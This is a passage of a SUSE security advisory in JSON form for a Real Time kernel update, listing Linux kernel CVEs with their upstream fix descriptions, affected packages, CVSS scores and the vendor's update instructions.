"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2024-53070"
},
{
"cve": "CVE-2024-53149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: glink: fix off-by-one in connector_status\n\nUCSI connector\u0027s indices start from 1 up to 3, PMIC_GLINK_MAX_PORTS.\nCorrect the condition in the pmic_glink_ucsi_connector_status()\ncallback, fixing Type-C orientation reporting for the third USB-C\nconnector.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53149",
"url": "https://www.suse.com/security/cve/CVE-2024-53149"
},
{
"category": "external",
"summary": "SUSE Bug 1234842 for CVE-2024-53149",
"url": "https://bugzilla.suse.com/1234842"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "low"
}
],
"title": "CVE-2024-53149"
},
{
"cve": "CVE-2024-56721",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-56721"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/CPU/AMD: Terminate the erratum_1386_microcode array\n\nThe erratum_1386_microcode array requires an empty entry at the end.\nOtherwise x86_match_cpu_with_stepping() will continue iterate the array after\nit ended.\n\nAdd an empty entry to erratum_1386_microcode to its end.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-56721",
"url": "https://www.suse.com/security/cve/CVE-2024-56721"
},
{
"category": "external",
"summary": "SUSE Bug 1235566 for CVE-2024-56721",
"url": "https://bugzilla.suse.com/1235566"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2024-56721"
},
{
"cve": "CVE-2025-22047",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22047"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/microcode/AMD: Fix __apply_microcode_amd()\u0027s return value\n\nWhen verify_sha256_digest() fails, __apply_microcode_amd() should propagate\nthe failure by returning false (and not -1 which is promoted to true).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22047",
"url": "https://www.suse.com/security/cve/CVE-2025-22047"
},
{
"category": "external",
"summary": "SUSE Bug 1241437 for CVE-2025-22047",
"url": "https://bugzilla.suse.com/1241437"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-22047"
},
{
"cve": "CVE-2025-37744",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37744"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix memory leak in ath12k_pci_remove()\n\nKmemleak reported this error:\n\n unreferenced object 0xffff1c165cec3060 (size 32):\n comm \"insmod\", pid 560, jiffies 4296964570 (age 235.596s)\n backtrace:\n [\u003c000000005434db68\u003e] __kmem_cache_alloc_node+0x1f4/0x2c0\n [\u003c000000001203b155\u003e] kmalloc_trace+0x40/0x88\n [\u003c0000000028adc9c8\u003e] _request_firmware+0xb8/0x608\n [\u003c00000000cad1aef7\u003e] firmware_request_nowarn+0x50/0x80\n [\u003c000000005011a682\u003e] local_pci_probe+0x48/0xd0\n [\u003c00000000077cd295\u003e] pci_device_probe+0xb4/0x200\n [\u003c0000000087184c94\u003e] really_probe+0x150/0x2c0\n\nThe firmware memory was allocated in ath12k_pci_probe(), but not\nfreed in ath12k_pci_remove() in case ATH12K_FLAG_QMI_FAIL bit is\nset. So call ath12k_fw_unmap() to free the memory.\n\nTested-on: WCN7850 hw2.0 PCI WLAN.HMT.2.0-02280-QCAHMTSWPL_V1.0_V2.0_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37744",
"url": "https://www.suse.com/security/cve/CVE-2025-37744"
},
{
"category": "external",
"summary": "SUSE Bug 1243662 for CVE-2025-37744",
"url": "https://bugzilla.suse.com/1243662"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-37744"
},
{
"cve": "CVE-2025-37751",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37751"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/cpu: Avoid running off the end of an AMD erratum table\n\nThe NULL array terminator at the end of erratum_1386_microcode was\nremoved during the switch from x86_cpu_desc to x86_cpu_id. This\ncauses readers to run off the end of the array.\n\nReplace the NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37751",
"url": "https://www.suse.com/security/cve/CVE-2025-37751"
},
{
"category": "external",
"summary": "SUSE Bug 1242505 for CVE-2025-37751",
"url": "https://bugzilla.suse.com/1242505"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-37751"
},
{
"cve": "CVE-2025-37813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: xhci: Fix invalid pointer dereference in Etron workaround\n\nThis check is performed before prepare_transfer() and prepare_ring(), so\nenqueue can already point at the final link TRB of a segment. And indeed\nit will, some 0.4% of times this code is called.\n\nThen enqueue + 1 is an invalid pointer. It will crash the kernel right\naway or load some junk which may look like a link TRB and cause the real\nlink TRB to be replaced with a NOOP. This wouldn\u0027t end well.\n\nUse a functionally equivalent test which doesn\u0027t dereference the pointer\nand always gives correct result.\n\nSomething has crashed my machine twice in recent days while playing with\nan Etron HC, and a control transfer stress test ran for confirmation has\njust crashed it again. The same test passes with this patch applied.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37813",
"url": "https://www.suse.com/security/cve/CVE-2025-37813"
},
{
"category": "external",
"summary": "SUSE Bug 1242909 for CVE-2025-37813",
"url": "https://bugzilla.suse.com/1242909"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-37813"
},
{
"cve": "CVE-2025-38209",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38209"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-tcp: remove tag set when second admin queue config fails\n\nCommit 104d0e2f6222 (\"nvme-fabrics: reset admin connection for secure\nconcatenation\") modified nvme_tcp_setup_ctrl() to call\nnvme_tcp_configure_admin_queue() twice. The first call prepares for\nDH-CHAP negotitation, and the second call is required for secure\nconcatenation. However, this change triggered BUG KASAN slab-use-after-\nfree in blk_mq_queue_tag_busy_iter(). This BUG can be recreated by\nrepeating the blktests test case nvme/063 a few times [1].\n\nWhen the BUG happens, nvme_tcp_create_ctrl() fails in the call chain\nbelow:\n\nnvme_tcp_create_ctrl()\n nvme_tcp_alloc_ctrl() new=true ... Alloc nvme_tcp_ctrl and admin_tag_set\n nvme_tcp_setup_ctrl() new=true\n nvme_tcp_configure_admin_queue() new=true ... Succeed\n nvme_alloc_admin_tag_set() ... Alloc the tag set for admin_tag_set\n nvme_stop_keep_alive()\n nvme_tcp_teardown_admin_queue() remove=false\n nvme_tcp_configure_admin_queue() new=false\n nvme_tcp_alloc_admin_queue() ... Fail, but do not call nvme_remove_admin_tag_set()\n nvme_uninit_ctrl()\n nvme_put_ctrl() ... Free up the nvme_tcp_ctrl and admin_tag_set\n\nThe first call of nvme_tcp_configure_admin_queue() succeeds with\nnew=true argument. The second call fails with new=false argument. 